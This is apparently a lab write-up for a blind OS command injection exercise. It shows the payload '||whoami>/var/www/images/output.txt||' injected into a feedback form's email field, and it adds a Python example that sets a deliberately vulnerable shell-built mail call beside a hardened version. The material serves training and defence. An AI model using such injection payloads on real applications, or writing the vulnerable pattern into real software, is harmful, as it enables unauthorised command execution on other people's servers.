# 03 Lab: Blind OS command injection with output redirection

## Objective

> This lab contains a blind OS command injection vulnerability in the feedback function.
>
> The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:
>
> ```
> /var/www/images/
> ```
>
> The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.
>
> To solve the lab, execute the `whoami` command and retrieve the output.

## Solution

> We assume the feedback functionality is implemented with the following script:

```bash
mail -s "This site is great" -a From:peter@normal-user.net feedback@vulnerable-website.com
```

1. We examine the Feedback section through Repeater, specifically the `email` field.

   ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-e11f7a0f6ee29636a47f1a2285d85484104e47c1%2Fimage.png?alt=media)
2. We add `||whoami>/var/www/images/output.txt||` to the `email` field, with a space at the start, to append an extra instruction.

   The resulting execution looks as follows and causes a file to be written. Remember that we must choose a correct path or file, and we already know that the directory is writable:

   ```bash
   mail -s "This site is great" -a From:peter@normal-user.net feedback@vulnerable-website.com ||whoami>/var/www/images/output.txt||
   ```

   ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-b2b692a13ef2f31c09903fda129624bea05f647f%2Fimage%201.png?alt=media)

   ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-abc2fcf2aaa013d57251afe699b59124a3f26b1a%2Fimage%202.png?alt=media)

   ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-c83c72fa39891afc4ed10a8432b1ff65618a1580%2Fimage%203.png?alt=media)
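
For the defensive side of the command shown above, the following added example (not part of the original write-up or the lab's code) puts the string-built shell call next to a hardened version that validates the address and executes `mail` without a shell. The function names, the allowlist regex and the `mailer` parameter (which lets the code run with a stand-in binary where `mail` is not installed) are assumptions made for illustration.

```python
import re
import subprocess

SUBJECT = "This site is great"                 # values from the page's assumed script
RECIPIENT = "feedback@vulnerable-website.com"
# Conservative allowlist (an assumption, not an RFC 5322 parser): no spaces,
# pipes, redirects, quotes or other shell metacharacters can match.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
QUIET = dict(stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL,
             stderr=subprocess.DEVNULL)


def send_feedback_vulnerable(email, mailer="mail"):
    """'Before': the email is pasted into a string that /bin/sh parses,
    so ||, > and similar characters in it become shell syntax."""
    cmd = f'{mailer} -s "{SUBJECT}" -a From:{email} {RECIPIENT}'
    return subprocess.run(cmd, shell=True, **QUIET).returncode


def feedback_argv(email, mailer="mail"):
    """Argument vector: the email is one argv element, never shell syntax."""
    return [mailer, "-s", SUBJECT, "-a", f"From:{email}", RECIPIENT]


def send_feedback_hardened(email, mailer="mail"):
    """'After': validate against the allowlist, then exec without a shell."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("rejected email address")
    return subprocess.run(feedback_argv(email, mailer), **QUIET).returncode


if __name__ == "__main__":
    payload = "||whoami>/var/www/images/output.txt||"   # string from the page
    print(feedback_argv(payload))          # stays a single literal argument
    print(bool(EMAIL_RE.fullmatch(payload)))
```

Either control alone stops the redirection: the argument list removes the shell that would interpret `||` and `>`, and the allowlist rejects the value before any process starts.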
